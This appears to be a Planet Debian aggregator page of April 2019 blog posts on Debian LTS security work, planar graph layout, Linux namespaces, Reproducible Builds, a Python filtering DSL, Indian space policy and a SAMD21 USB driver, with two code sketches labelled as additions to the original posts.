April 05, 2019

Shirish Agarwal

DevSecOps Pune Meetup 4

This I had attended almost a month back. I just didn’t have the time or the energy to blog about it. Thankfully, one of the organizers Rohan Nageskar took the time to blog about it so I don’t have to do much other than share a few of the links I had shared and some which I had forgotten to do on that date. The first one was about usage of A.I. for vulnerability assessment using Twitter mentions as a source. While the idea certainly has merit and would go a long way in getting nods to fix vulnerabilities in the code during the whole cycle of development, production, deployment, scaling, maintenance till the time the code or app. or whatever needs to be retired. At the same time however, it is not known how accurate the system would be because at the end, it still relies on human input and humans per se are bad at threat perception and evaluation as per millions of examples. All the wars that have been fought and are still being fought in whatever name are a strong example of that.

One of the other things that I shared was the Intel Spoiler attack which was shared just a few hours ago or something so it was pretty fresh at the time. I also shared a bit about where the hardware industry seemed to be heading and it seems at least for the near future that AMD would have the leg up. There’s the whole RISC bit for which chips are already out there and lot more being promised in the coming months and year but that’s a different topic altogether.

Incidentally, while Rohan was sharing about using Ansible for scaling a webapp and how you would have different servers for scaling the webapp depending on needs, I was wondering that definitely the BJP IT Team would have profited from Rohan’s presentation. While Rohan didn’t go much into specifics of things, it was more of a high-level overview of the process, it did establish some groundwork for any individual or team as to how they could go about it. For newbies they could well read up on the differences on webapp and website. To my mind, they are one and the same as most sites nowadays are dynamic in nature due to nature of things.

I also shared about the BJP site hack (unofficially of course) and everybody was nonplussed to learn about it because we all have been told again and again the skills the BJP IT cell has. This is when it was almost 2 weeks when the site was down. Few days later, they did put a sort of site back and stole a bootstrapable theme. There were quite a few hate comments, which can easily be termed victim-shaming and they had no choice but to respond back. It seems that the people in BJP either do not understand or don’t want to understand Intellectual Property Rights or to be more specific, Copyright in this particular case. This specific example is clearly a case of copyright infringement rather than anything else. In fact all of the FOSS environment revolves around credit-sharing apart from monetary compensation.

Anyways, some pictures from the meetup to round off the day 🙂

Me sharing some point probably
All the attendees of the Devops meetup.

In the last picture you can see Rohan at the end right in an orange t-shirt with glasses while Rahul you can see in dead center in white shirt at the center. They were the organizers of the event. Many thanx to Qualys for being the host for the meetup.

05 April, 2019 07:55AM by shirishag75

April 04, 2019

Ian Jackson

Planar graph layout, straight line drawing

My project to make an alternative board for Pandemic Rising Tide needed a program to lay out a planar graph, choosing exact coordinates for the vertices.

(The vertices in question are the vertices of the graph which is the dual of the adjacency graph of the board "squares" - what Pandemic Rising Tide calls Regions. For gameplay reasons the layout wants to be a straight line drawing - that is, one where every boundary is a straight line.)

Existing software

I found that this problem was not well handled by existing Free Software. The leading contender, graphviz, generally produces non-planar layouts even for planar inputs; and it does not provide a way to specify the planar embedding. There are some implementations of "straight line drawing" algorithms from the literature, but these produce layouts which meet the letter of the requirement for the drawing to consist only of nonintersecting straight lines, but they are very ugly and totally unsuitable for use as a game board layout.

My web searches for solutions to this problem yielded only forum postings etc. where people were asking roughly this question and not getting a satisfactory answer.

I have some experience with computer optimisation algorithms and I thought this should be a tractable problem, so I set out to solve it - well, at least well enough for my purposes.

My approach

My plan was to use one of the algorithms from the literature to generate a straight line drawing, and then use cost-driven nonlinear optimisation to shuffle the vertices about into something pretty and useable.

Helpfully Boost provides an implementation of Chrobak & Payne's straight line drawing algorithm. Unfortunately Boost's other planar graph functions were not suitable because they do not remember which face is the outer face. (In planar graph theory and algorithms the region outside the graph drawing is treated as a face, called the outer face.) So I also had to write my own implementations of various preparatory algorithms - yet more yak shaving before I could get to the really hard part.

Having been on a Rust jag recently, I decided on Rust as my implementation language. I don't regret this choice, although it did add a couple of yaks.

Cost function and constraints

My cost function has a number of components:
  • I wanted to minimise the edge lengths.
  • But there was a minimum edge length (for both gameplay and aesthetic reasons)
  • Also I wanted to avoid the faces having sharp corners (ie, small angles between edges at the same vertex)
  • And of course I needed the edges to still come out of each vertex in the right order.
You will notice that two of these are not costs, but constraints. Different optimisation algorithms handle this differently.

Also "the edges to still come out of each vertex in the right order" is hard to express as a continuous quantity. (Almost all of these algorithms demand that constraints take the form of a function which is to be nonnegative, or some such.) My solution is, at each vertex, to add up the angles between successive edges (in the intended order, and always treating each direction difference as a positive angle). Ie, to add up the face corner angles. They should sum to tau: if so, we have gone round once and the order is right. If the edges are out of order, we'll end up going round more than once. If the sum was only tau too much, I defined the violation quantity to be tau minus the largest corner angle; this is right because probably it's just that two edges next to each other are out of order and the face angle has become "negative"; this also means that for a non-violating vertex, the violation quantity is negative but still represents how close to violation we are. (For larger corner angle sums, I added half of the additional angle sum as an additional violation quantity. That seemed good enough in the end.)
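The edge-order violation quantity described above, as an added sketch that is not code from plag-mangler (which is written in Rust; Python is used here only for illustration). The function names are hypothetical, and the value returned for a correctly ordered vertex (minus the smallest corner angle) is an assumption chosen so the quantity changes continuously as two neighbouring edges cross; the post does not spell that case out.

```python
import math

TAU = 2 * math.pi


def corner_angles(vertex, neighbours):
    """Angles between successive edges at `vertex`.

    `neighbours` lists the adjacent vertices in the intended cyclic order.
    Every direction difference is taken as a positive angle in [0, tau).
    """
    vx, vy = vertex
    dirs = [math.atan2(y - vy, x - vx) for x, y in neighbours]
    n = len(dirs)
    return [(dirs[(i + 1) % n] - dirs[i]) % TAU for i in range(n)]


def order_violation(vertex, neighbours):
    """Positive when the edges leave `vertex` in the wrong order."""
    if len(neighbours) < 3:
        raise ValueError("fewer than three edges have no order to violate")
    angles = corner_angles(vertex, neighbours)
    total = sum(angles)
    turns = round(total / TAU)  # the sum is always a whole number of turns
    if turns <= 1:
        # Order is right. Assumption: report how close we are to violation
        # as minus the smallest corner angle.
        return -min(angles)
    # One turn too many: two neighbouring edges have probably crossed, and
    # the corner between them, really "negative", shows up as nearly tau.
    violation = TAU - max(angles)
    if turns > 2:
        # Larger sums: add half of the additional angle sum.
        violation += (total - 2 * TAU) / 2
    return violation


def on_unit_circle(*degrees):
    """Constructed sample input: neighbours at the given bearings."""
    return [(math.cos(math.radians(d)), math.sin(math.radians(d)))
            for d in degrees]


if __name__ == "__main__":
    origin = (0.0, 0.0)
    for bearings in [(0, 80, 90, 270), (0, 100, 90, 270), (0, 270, 180, 90)]:
        v = order_violation(origin, on_unit_circle(*bearings))
        print(bearings, round(math.degrees(v), 3))
```

In the constructed inputs the second edge moves from 80° to 100° past the third edge at 90°, so the quantity moves from -10° to +10°; the fully reversed order goes round three times and picks up the extra half-of-excess term.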

Simulated annealing - and visual debug of the optimisation

My first attempt used GSL's simulated annealing functions. I have had reasonable success with siman in the past. The constraints are folded into the cost function. (An alternative approach is to somehow deal with them in the random step function, eg by adjusting violating layouts to similar non-violating ones, but that seemed quite tricky here.)

Siman did not seem to be working at all.

I was hampered by not knowing what was going on so I wrote a visual debug utility which would let me observe the candidate layouts being tried, in real time. (I should have taken my first instinct and done it in Tcl/Tk, but initially Qt seemed like it would be easier. But in the end I had to fight several of Qt's built-in behaviours.)

The visual debug showed me the graph randomly jiggling about without any sign of progress. It was clear that if this was going to work at all it would be far too slow.

More suitable optimisation algorithm

I felt that a gradient descent algorithm, or something like one, would work well for this problem. It didn't seem to me that there would be troublesome local minima. More web searching led me to Steven G. Johnson's very useful NLopt library. As well as having implementations of algorithms I thought would work well, it offered the ability to change algorithm without having to deal with a whole new API.

I quickly found that NLopt's Sbplx algorithm (T. Rowan's Subplex algorithm, reimplemented) did fairly well. That algorithm does not support constraints but the grandly-named Augmented Lagrangian Method can handle that: it adds the constraint violations to the cost. It then reruns the optimisation, cranking up the constraint violation cost factor until none of the constraints are violated by more than the tolerance.

Unfortunately the Augmented Lagrangian Method can convert a problem with a cost function without local minima, into one which does have bad local minima. The Sbplx algorithm is a kind of descent algorithm so it finds a local minimum and hopes it's what you wanted. But unfortunately for me it wasn't: during the initial optimisation, part of the graph "capsized", violating the edge order constraint and leaving a planar layout impossible. The subsequent cranking up of the constraint violation cost didn't help, I think maybe because my violation cost was not very helpful at guiding the algorithm when things were seriously wrong.

But I fixed this by the simple expedient of adding the edge order constraint with a high cost to my own cost function. The result worked pretty well for my simple tests and for my actual use case. The graph layout optimisation takes a couple of minutes. The results are nice, I think.

I made a screen capture video of the optimisation running. (First the debug build which is slower so captures the early shape better; then again with the release build.)

Software

The planar graph layout tool I wrote is plag-mangler.

It's really not very productised, but I think it will be useful to people who have similar problems. Many of the worst features (eg the bad command line syntax) would be easy to fix. OTOH if you have a graph it does badly on, please do file an issue on salsa, as it will guide me to help make the program more general.

References

See my first post about this project for some proper references to the academic literature etc.

(Edit 2019-04-04 12:55 +0100: Fixed typos and grammar.)


04 April, 2019 11:56AM

April 03, 2019

Iustin Pop

A small presentation on Linux namespaces

Over the weekend I spent time putting together a few slides on Linux namespaces, mostly because I wanted to understand better (and putting this together helped a lot!), but also because it will be useful to me later, and finally (and really) because I promised to a few colleagues I’ll explain how all this works :)

So the HTML slides are here, and the source is on github. I put the source up because I’m very sure this has lots of mistakes; not only in the intro where I mention FreeBSD jails and OpenVZ a bit (but I have zero experience with both), but also in the main content, so any corrections are more than welcome.

Writing this, and organising it, was actually much more entertaining than I originally thought. It also made me realise that the kernel-level implementation is very powerful, and—at least to the extent that e.g. Debian uses it by default—it’s basically wasted (a lot of lost opportunity). I know there are some tools to use this, but for example why Firefox is not by default namespaced… I don’t know. Food for later thought. Happy to receive information otherwise, of course.

Most of the information is gathered from man pages, Wikipedia (for the historic bits), blog posts, mailing list archives, etc., so I don’t claim a lot of deep original content; the main idea is just to put all this information together in a single place.

Hope this is useful to somebody else, and again, contributions and re-sharing welcome (CC-BY-SA-4.0).

03 April, 2019 07:41PM

Sylvain Beucler

Debian LTS - March 2019

In February I had requested to join the Debian LTS project, which extends the security support for past Debian releases, as a paid contributor.
Kudos to Freexian for pulling this project out.

I was asked to demonstrate a full security update on my own (non paid) which I did with 2 DLAs (Debian LTS Advisory):

  • freedink-dfarc: jessie-security update, applying my own path traversal security fix
  • phpmyadmin: jessie-security update, assessing 1 CVE as not affected and fixing another

Incidentally, every Debian Developer can make a direct security upload to jessie-security without prior validation (just follow the guide).

-

Following the spirit of transparency that animates Debian and Debian Security, here's my report for my first paid month.

In March, the monthly sponsored hours were split evenly among contributors depending on their max availability.
I got 29.5h, which I spent on:

  • nettle/gnutls: investigate local side-channel attack and conclude no-dsa / minor issue
  • symfony: helped test Roberto's update
  • sqlalchemy: jessie-security update for SQL injection, tested and discussed upstream's own backported patch
  • glib2.0: investigate denial of service and mark as no-dsa / not reproducible
  • ghostscript: investigate sandbox break and (lack of) test suite, and conclude we'll backport the next upstream release
  • pdns: jessie-security update for the 'remote' backend
  • Fixes/updates in dla-needed.txt, our (public) list of triaged security issues
  • Fixes in LTS wiki, templates and scripts, in particular wrt https://www.debian.org/lts/security/ integration

If you'd like to know more about LTS security, I recommend you check:

03 April, 2019 02:02PM

Mike Gabriel

My Work on Debian LTS/ELTS (March 2019)

In March 2019, I have worked on the Debian LTS project for 14 hours (of 10 hours planned plus 4 hours pulled over from February) and on the Debian ELTS project for another 2 hours (of originally planned 6 hours) as a paid contributor.

LTS Work

  • CVE triaging (ntp, glib2.0, libjpeg-turbo, cron, otrs2, poppler)
  • Sponsor upload to jessie-security (aka LTS): cron (DLA 1723-1 [1])
  • Upload to jessie-security (aka LTS): openssh (DLA 1728-1 [2])
  • Upload to jessie-security (aka LTS): libssh2 (DLA 1730-1 [3])
  • Upload to jessie-security (aka LTS): libav (DLA 1740-1 [4])

ELTS Work

  • Create .debdiff for cron src:pkg targeting wheezy (but I failed to build it due to two issues with Debian 10 as build machine)
  • Discover and document that kernel boot parameter "vsyscall=emulate" is required for building wheezy packages on Debian 10. (See #844350 and #845942 for details).
  • Bug hunt sbuild bug #926161 in sbuild 0.78.1-1 [5]

References

03 April, 2019 01:23PM by sunweaver

April 02, 2019

Shirish Agarwal

ASAT and ISRO, DRDO merger rumor

ASAT Test

For last few days I was not in Pune as had gone to attend a workshop which was funded by Innovation for change . Unfortunately, I was not able to take part in the workshop as the traveling proved to be a bit too much in too short a time. While I would share more in another blog post for the moment, I would like to share about the ASAT test that India conducted. While it’s a positive development, from my perspective there was no need for the Prime Minister to come on-stage and declare that we can shoot down a Satellite at 3k when China can do the same at 38k . So we have a long way to go, in as far as parity with China is concerned. While I’m not sharing the source of this information, this is for all and anybody to see and figure out if you know how to use the web. There are a few things I would share, I didn’t use any private data-sets to get this information, which means it’s available easily online. I did not use tor, the dark web otherwise I probably could have got far more material. Thirdly and more interestingly, if you wanna start your search from scratch, ORF could be a good starting point from an Indian POV although there are many other such think-tanks which could help you in your research.

The only question I have to ask is if we are the weaker party, which is clearly the case herein, then whom are we trying to sell this idea if not the Indian public ? Chinese military satellites are in varying range from 300 km. to 36,000 km. so there is hardly a chance that we would be able to make any significant dent to their military usage. Also using an ASAT on another country’s satellite would be an act of war. As far as Communication satellites are concerned, they are also at 36,000 km. are at the Geostationary orbit so they will not be harmed. There is also a pretty nice animation of the same at wikimedia .

International Politics

While we can understand that Mr. Modi did it for electioneering, it does have impact internationally. Last year when the Chinese did another ASAT test (which the Pentagon guestimate it reached 36k from sea level from their ground and space-based instruments). The Chinese statement was quite brief and to the point. They said that they did the test and it performed on all the military objectives. This is a sort of perfect statement which doesn’t reveal either what the Chinese military objectives of the test were and what was accomplished. All other Governments either have to rely on their own instrumentation (if they have in space to spy and on lookout for such activities) or rely on Pentagon’s guestimates and findings which they chose to make public. The Americans are also well to not show their hand and may share some information or even share mis-information as this is and would be considered part of Information warfare. This is also precisely the reasons we have ambassadors, diplomats and others who sit together and are engaged in nuanced wording. There was no need of an announcement and even if it needed, it could have been done by some mid-level executive on DRDO saying something similar on the lines of what the Chinese said and probably adding we have a long road ahead of us or something like that.

Update – 04/04/2019 – Somebody on twitter shared a link to Dr. Saraswat’s latest interview which was held a few days back .

The answers were designed in the way so as to show that the UPA govt. didn’t show the interest for the ASAT test while the NDA Govt. Even if we do take Dr. Saraswat’s interpretation of how the event happened, it still raises questions rather than answers.

  1. By Dr. Saraswat’s own admission, it was an informal presentation. While he didn’t go into the details of what he meant by ‘informal presentation’ it could be something akin to somebody asking me to do an informal presentation on Debian. For this, the most I have to do is collect my thoughts, read up a bit onto what’s new, exciting if there is something which catches my eye and at the most have 5-7 pages of slides and depending upon what kind of organization it is, I would share what Debian is. If however, somebody would ask me to make a presentation on a possible Debian deployment, it would consist of knowing and having details of how small or big the network is ? What are the critical points in the network (for e.g. many shops or small businesses have either their custom-designed billing system whose source-code they don’t have and has to be on MS-Windows) while other systems you could potentially do the deployment. Apart from doing the actual deployment, there would be time for training, documentation etc. all of which involve some sort of hard numbers and time which both parties would have to work at to get some sort of understanding of how this different system works.

  2. And this is where my question comes in. In the interview it’s also not mentioned what time or date when the presentation was done. Now we all know that 2014 was only a year away, if the presentation was done 6-9 months before elections, it is very much possible that there was no interest because it would be time-consuming and there are no guarantees of a successful test. In fact, before this test which was declared a success, there was another test which was conducted by DRDO which was a failure. This also begs or marks the question as to when did Dr. Saraswat approach NDA or vice-versa and when he started actively working on the project. Did it take 5 years for this to come to this stage or 2 years or less because that would give some more guidance and a way for us to gauge future success of the project.

Rumour of Merging DRDO and ISRO

There is also a worrying bit of news that the Government of India is thinking of merging both DRDO and ISRO to be similar structure to what the Chinese have for their space program, which I think will be disastrous for the Indian Space Program, the taxpayer public money as well as the two organizations as well.

DRDO work culture

While my mother had the honor of serving within a sub-set of DRDO and she was friends with few scientists, one of the major grouses for most scientists was the constant shifting of parameters or specifications. To take a very simple example, let’s think that you are told or given a set of specs. of a Maruti 800, a small city car, then a year, year down the half, you are told that the design specifications have changed to now a Station Wagon or a hatchback and when you start to design for those, the specs. are changed again in a year or two to a sports car. Now any car-enthusiast would know that these three are completely different cars having their unique needs, dimensions, center of gravity, steering, fuel consumption, the works. Extrapolate that to a missile or missiles where more often than not, these design changes were at many a times not asked by the Armed forces who would be the actual users but the bureaucracy i.e. civil servants, many from IAS who instead of consulting, using consensus of the people on both sides, instead share and put whatever opinion they have. Of course inter-personality conflicts also do occur and in spite of it DRDO is able to do what it does. Because of quite a few such Inter-personality conflicts, many a brilliant scientist have been forced to leave DRDO and are now either serving private Indian interests or some foreign ones and they repent why they spent their best productive years at DRDO or whatever sub-unit they were into.

ISRO Work culture

While I do not have relatives working in ISRO, I do and did have friends who work or have worked in ISRO. Due to the nature of the work itself, which is more exploratory and peaceful in nature, they are able to collaborate with lot of educational institutions within India and worldwide and even collaborate with organizations like NASA, ESA and others. The civilian bureaucracy has had a more hands-off approach which has resulted in ISRO being able to carry out whatever fantastic achievements they have been able to achieve. The only thing, if they need to learn from this Government, is the ability to find money and do more of promotion of the good work they are doing. Even if ISRO were to do 1% of the promotion that NASA does in promotion with merchandising, they would get more than money back while at the same time inspire millions of young children to take up challenges in space sciences.

So from the above, it is pretty clear it would be disastrous as both have a very different mind-set and ways of working. I remember hearing or conversing with some military gentleman couple of years ago and we were talking on some similar topics. This was on a short train trip. The gentleman remarked, it’s not often that we get things to work right the first time, in any of the fields of endeavour the military does. If we do, even some small part, we make sure not to disturb or change it and would make changes around it so it works and fix all the other things and processes till there is cohesion. He went on to share some real-life examples from his work which I have since forgotten but the principle seems good, solid enough at least to me.

Making Organizations Fun

At the very end, I would like to draw attention to Jonathan Carter’s blog post where he shares about Debian and Fun. I found both the art pieces most appropriate not just for the organizations listed above, but should be the calling points of any organization which believes in genuine stewardship of whatever organization they have or hope to take forward.

While I would invite everybody who has more than a passing interest in the world of computer science to see Jonathan’s and other potential DPL (Debian Project Leader) platforms as well as their rebuttals, the difference between the two is statements or pictures above is that while the first one is an employer-employee model, the second is more on the volunteer, contributor-steward model. Although as DPL , the only perks the DPL enjoys are speaking about Debian in sometimes exotic locations, although that is more than tempered by being part of Debian Politics and Free software politics which comes with its own rewards, risk scenario and is and can be pretty tricky as has been observed over the years.

02 April, 2019 10:48PM by shirishag75

Reproducible builds folks

Reproducible Builds: Weekly report #205

Here’s what happened in the Reproducible Builds project between March 24th and March 30th 2019:

Don’t forget that Reproducible Builds is part of May/August 2019 round of Outreachy which offers paid internships to work on free software. Internships are open to applicants around the world and are paid a stipend for the three month internship with an additional travel stipend to attend conferences. So far, we received more than ten initial requests from candidates and the closing date for applicants is April 2nd. More information is available on the application page.

Packages reviewed and fixed, and bugs filed

Test framework development

  • We operate a comprehensive Jenkins-based testing framework that powers tests.reproducible-builds.org. The following changes were done this week:

    • Mattia Rizzolo built a static list of SSH host keys so we could build the ssh_config file based on this file, leading to being able to enable OpenSSH’s StrictHostKeyChecking option.
    • Holger Levsen added a number of links to pages, including Guix’s challenge command, the F-Droid tests as well as NixOS and openSUSE tests.

This week’s edition was written by Bernhard M. Wiedemann, Chris Lamb & Holger Levsen and was reviewed by a bunch of Reproducible Builds folks on IRC & the mailing lists.

02 April, 2019 01:11PM

Ben Hutchings

Debian LTS work, March 2019

I was assigned 20 hours of work by Freexian's Debian LTS initiative and carried over 16.5 hours from February. I worked 22.5 hours and so will carry over 14 hours.

I merged changes from stretch's linux package into the linux-4.9 package, uploaded that, and issued DLA-1715. I made another stable update to Linux 3.16 (3.16.64). I then rebased Debian's linux package on that version, uploaded it, and issued DLA-1731. This unfortunately introduced a regression, which I fixed in a second update.

I also reviewed and merged Emilio Pozuelo Monfort's changes to the firmware-nonfree package to address CVE-2018-5383.

02 April, 2019 10:12AM

Abhijith PA

DebUtsav Delhi

Hello.

Three weeks ago I attended DebUtsav-Delhi organized by the Debian and free folks in North India.

Group photo

Debutsav-Delhi is the third edition of its kind. Initially Mozilla Delhi backed the Debutsav-delhi when they pitched the idea but later they withdrew for some reason and just became a supporting member. I must say Debian India events are happening frequently now. Some years ago in India Debian hung around with other FLOSS events. Now it's DebUtsav giving chance to other FLOSS people to meet around Debian.

As the usual way of DebUtsav, this one also was two day event with separate track for Debian related talks and for general FLOSS talk. I gave a talk about Debian LTS project. On first day evening some speakers and organizers gathered for dinner.

Dinner

It's funny that most of the Debian people gathered there were contributing/contributed to Ruby and JavaScript team. There is a strong reason for that. All the contributors to Debian from India after 2014 were branched out from a single person who does mostly Ruby and JS - Pirate Praveen. You can expect a blog post from him about Debutsav. He is contesting in upcoming Lok Sabha Elections and quite busy with that.

On second day there were talks from SFLC - Digital Security and Privacy. Srud conducted an interactive session with topic Gender diversity in FLOSS projects. We reserved afternoon sessions for Bug Squashing Party and introducing packaging tutorial to newcomers. All together it was a wonderful gathering. I also met isaagar with whom I have corresponded in matrix a lot but finally able to meet him IRL.

Special appreciation to Hamara Linux for sponsoring the event. They are becoming the de facto sponsors of every Debian event in India.

02 April, 2019 08:24AM

Dirk Eddelbuettel

tint 0.1.1: New Styles

With almost a year passed since the previous 0.1.0 release, a nice new release of the tint package arrived on CRAN today. Its name expands from tint is not tufte as the package offers a fresher take on the Tufte-style for html and pdf presentations.

This version adds new features, and a new co-author. Jonathan Gilligan calmly and persistently convinced me that there was ‘life beyond Roboto’ and I overcame the reluctance to offer other fonts. So now we have two additional reference implementations for Lato and Garamond which look stunning, as well as generally enhanced support for fonts, font families and entire LaTeX templates all via the standard YAML headers.

A screenshot for Lato follows:

And another for garamond:

The full list of changes is below.

Changes in tint version 0.1.1 (2019-03-30)

  • The two pdf styles have been extended allowing more flexible LaTeX customization particularly for fonts but also link colour. (Jonathan in #30)

  • Two example documents were added pre-rendered (and not as vignettes to keep processing lighter)

  • Documentation for the HTML style was updated (Jonathan in #30).

Courtesy of CRANberries, there is a comparison to the previous release. More information is on the tint page.

For questions or comments use the issue tracker off the GitHub repo.

This post by Dirk Eddelbuettel originated on his Thinking inside the box blog. Please report excessive re-aggregation in third-party for-profit settings.

02 April, 2019 01:03AM

April 01, 2019

Gunnar Wolf

Debian @ Internet Freedom Festival #internetFF

Today, we had a little get-together of DDs in València, Spain, with some other DDs.

Most of us were here to attend the Internet Freedom Festival (IFF), plus Héctor and Filippo, who are locals. We missed some DDs (because in a 2500+ people gathering... Well, you cannot ever find everybody you are looking for!) so, sorry guys for not having you attend!

Sadly, we have no further report than having enjoyed a very nice dinner. No bugs were closed, no policy was discussed, no GRs were drafted, no cabals were hatched.

01 April, 2019 11:07PM by gwolf

Hideki Yamane

Specifying debian mirror for your docker image

For people who use Debian as docker base image...

  • Do not use ftp.debian.org as your apt line in docker image, use deb.debian.org instead. It chooses a mirror near where users are
  • If you use old Jessie, use cdn-fastly.deb.debian.org instead of deb.debian.org, since the old apt in Jessie cannot handle redirects
  • Do not use httpredir.debian.org, it is obsolete


01 April, 2019 09:08AM by Hideki Yamane (noreply@blogger.com)

Julien Danjou

Writing Your Own Filtering DSL in Python

A few months ago, we saw how to write a filtering syntax tree in Python. The idea behind this was to create a data structure — in the form of a dictionary — that would allow filtering data based on conditions.

Our API looked like this:

>>> f = Filter(
  {"and": [
    {"eq": ("foo", 3)},
    {"gt": ("bar", 4)},
   ]
  },
)
>>> f(foo=3, bar=5)
True
>>> f(foo=4, bar=5)
False

While such a mechanism is pretty powerful to use, the input data structure format might not be user friendly. It's great to use, for example, with a JSON based REST API, but it's pretty terrible to use for a command-line interface.

A good solution to that problem is to build our own language. That's called a DSL.

Building a DSL

What's a Domain-Specific Language (DSL)? It's a computer language that is specialized to a certain domain. In our case, our domain is filtering, as we're providing a Filter class that allows filtering a set of values.

How do you build a data structure such as {"and": [{"eq": ("foo", 3)}, {"gt": ("bar", 4)}]} from a string? Well, you define a language, parse it, and then convert it to the right format.

In order to parse a language, there are a lot of different solutions, from implementing manual parsers to using regular expressions. In this case, we'll use lexical analysis.

First Iteration

Let's start small and define the base of our grammar. That should be something simple, so we'll go with <identifier><operator><value>. For example "foobar"="baz" is a valid sentence in our grammar and will convert to {"=": ("foobar", "baz")}.

The following code snippet leverages pyparsing for parsing the string and specifying the grammar:

import pyparsing

identifier = pyparsing.QuotedString('"')
operator = (
    pyparsing.Literal("=") |
    pyparsing.Literal("≠") |
    pyparsing.Literal("≥") |
    pyparsing.Literal("≤") |
    pyparsing.Literal("<") |
    pyparsing.Literal(">")
)
value = pyparsing.QuotedString('"')

match_format = identifier + operator + value

print(match_format.parseString('"foobar"="123"'))

# Prints:
# ['foobar', '=', '123']

With that simple grammar, we can parse and get a token list composed of our 3 items: the identifier, the operator and the value.

Transforming the Data

The list above in the format [identifier, operator, value] is not really what we need in the end. We need something like {operator: (identifier, value)}. We can leverage pyparsing API to help us with that.

def list_to_dict(pos, tokens):
    return {tokens[1]: (tokens[0], tokens[2])}


match_format = (identifier + operator + value).setParseAction(list_to_dict)

print(match_format.parseString('"foobar"="123"'))

# Prints:
# [{'=': ('foobar', '123')}]

The parseString method allows modifying the returned value of a grammar token. In that case, we transform the list into the dict we need.

Plugging the Parser and the Filter

In the following code, we'll reuse the Filter class we wrote in our previous post. We'll just add the following code to our previous example:

def parse_string(s):
    return match_format.parseString(s, parseAll=True)[0]


f = Filter(parse_string('"foobar"="baz"'))
print(f(foobar="baz"))
print(f(foobar="biz"))

# Prints:
# True
# False

Now, we have a pretty simple parser and a good way to build a Filter object from a string.

As our Filter object supports complex and nested operations, such as and and or, we could also add it to the grammar — I'll leave that to you reader as an exercise!

Building your own Grammar

pyparsing makes it easy to build one's own grammar. However, it should not be abused: building a DSL means that your users will have to discover and learn it. If it's way different than what they know and already exists, it might be cumbersome for them.

Finally, if you're curious and want to see a real world usage, Mergify condition system leverages pyparsing to implement its parser. Check it out!

01 April, 2019 07:25AM by Julien Danjou
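
An added example, not part of Julien Danjou's post above: one way to do the exercise the post leaves open, extending the "identifier operator value" grammar with and, or and parentheses. It uses a hand-written recursive-descent parser on the standard library instead of pyparsing; evaluate() is a hypothetical stand-in for the Filter class (which is not shown on this page), and FilterSyntaxError and MAX_DEPTH are assumptions of this sketch.

```python
import operator
import re

# One token per match: quoted string, comparison operator, parenthesis, keyword.
TOKEN_RE = re.compile(r'''
    \s*(?:
        "(?P<str>[^"]*)"      # quoted identifier or value, as in the post
      | (?P<op>[=≠≥≤<>])      # the six operators of the post's grammar
      | (?P<paren>[()])
      | (?P<kw>and|or)\b
    )''', re.VERBOSE)

MAX_DEPTH = 32  # assumed cap on nesting so hostile input cannot exhaust the stack

OPS = {"=": operator.eq, "≠": operator.ne, "≥": operator.ge,
       "≤": operator.le, "<": operator.lt, ">": operator.gt}


class FilterSyntaxError(ValueError):
    """Raised for any input that is not a complete sentence of the grammar."""


def tokenize(s):
    s = s.rstrip()
    pos, tokens = 0, []
    while pos < len(s):
        m = TOKEN_RE.match(s, pos)
        if not m:
            raise FilterSyntaxError(f"unexpected input at offset {pos}")
        tokens.append((m.lastgroup, m.group(m.lastgroup)))
        pos = m.end()
    return tokens


class Parser:
    def __init__(self, tokens):
        self.tokens = tokens
        self.i = 0

    def peek(self):
        return self.tokens[self.i] if self.i < len(self.tokens) else (None, None)

    def take(self, kind):
        k, v = self.peek()
        if k != kind:
            raise FilterSyntaxError(f"expected {kind}, got {v!r}")
        self.i += 1
        return v

    def parse_or(self, depth):
        # "or" binds loosest, so it is parsed at the outermost level.
        terms = [self.parse_and(depth)]
        while self.peek() == ("kw", "or"):
            self.i += 1
            terms.append(self.parse_and(depth))
        return terms[0] if len(terms) == 1 else {"or": terms}

    def parse_and(self, depth):
        terms = [self.parse_atom(depth)]
        while self.peek() == ("kw", "and"):
            self.i += 1
            terms.append(self.parse_atom(depth))
        return terms[0] if len(terms) == 1 else {"and": terms}

    def parse_atom(self, depth):
        if self.peek() == ("paren", "("):
            if depth >= MAX_DEPTH:
                raise FilterSyntaxError("nesting too deep")
            self.i += 1
            node = self.parse_or(depth + 1)
            if self.peek() != ("paren", ")"):
                raise FilterSyntaxError("missing closing parenthesis")
            self.i += 1
            return node
        ident = self.take("str")
        op = self.take("op")
        value = self.take("str")
        return {op: (ident, value)}  # same shape as the post's list_to_dict


def parse_string(s):
    parser = Parser(tokenize(s))
    tree = parser.parse_or(0)
    if parser.i != len(parser.tokens):  # same intent as parseAll=True
        raise FilterSyntaxError("trailing input after expression")
    return tree


def evaluate(tree, **values):
    """Hypothetical stand-in for Filter: walk the tree against keyword values."""
    (key, arg), = tree.items()
    if key == "and":
        return all(evaluate(t, **values) for t in arg)
    if key == "or":
        return any(evaluate(t, **values) for t in arg)
    ident, expected = arg
    # Values are quoted strings in this grammar, so comparisons are on strings.
    return ident in values and OPS[key](values[ident], expected)


if __name__ == "__main__":
    tree = parse_string('"foo"="3" and ("bar">"4" or "baz"="x")')
    print(tree)
    print(evaluate(tree, foo="3", bar="5"))
```

Because the string is tokenized and turned into a plain dictionary tree, nothing in the user's filter is ever executed as Python; anything outside the grammar is rejected with FilterSyntaxError.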

Paul Wise

FLOSS Activities March 2019

Changes

Issues

Review

Administration

  • Debian wiki: update email addresses, whitelist email addresses, whitelist domains
  • Debian security tracker: merge patches

Communication

Sponsors

All work was done on a volunteer basis.

01 April, 2019 03:06AM

March 31, 2019

Keith Packard

samd21-usb

SAMD21 USB vs Windows 7

I'm mostly used to USB being really hard to get working on a new SoC, everything from generating a stable 48MHz clock to diving through thousands of register definitions to get the device programmed to receive that first SETUP packet. However, I'm used to having that part be the hardest section of the work, and once the first SETUP packet has been received and responded to successfully, it's usually down hill from there.

Not this time.

I've written about Snek on the SAMD21G18A before, and this is about the same board. USB on this device is medium-complicated, as the device supports both host and device modes, plus has a range of 'optimizations' which always makes simple operation harder. It took a few hours of hacking to get SETUP packets flowing, but after that (at least when talking to Linux and Mac OS X), the rest of the USB driver was pretty simple.

Enter Windows 7

I'm pushing towards a Snek 1.0 release and was testing snekde on Windows 7. It's working great with the classic Arduino Duemilanove, but when I plugged in the Metro M0 board, it got stuck after I typed one character. "That's Odd", I thought.

I figured it'd be a simple matter of a stuck interrupt or other minor mistake in the SAMD21 USB driver that I wrote. So, I broke out my trusty Beagle USB analyzer to see where the USB link was getting stuck.

IN-NAK ... IN DATAx ...

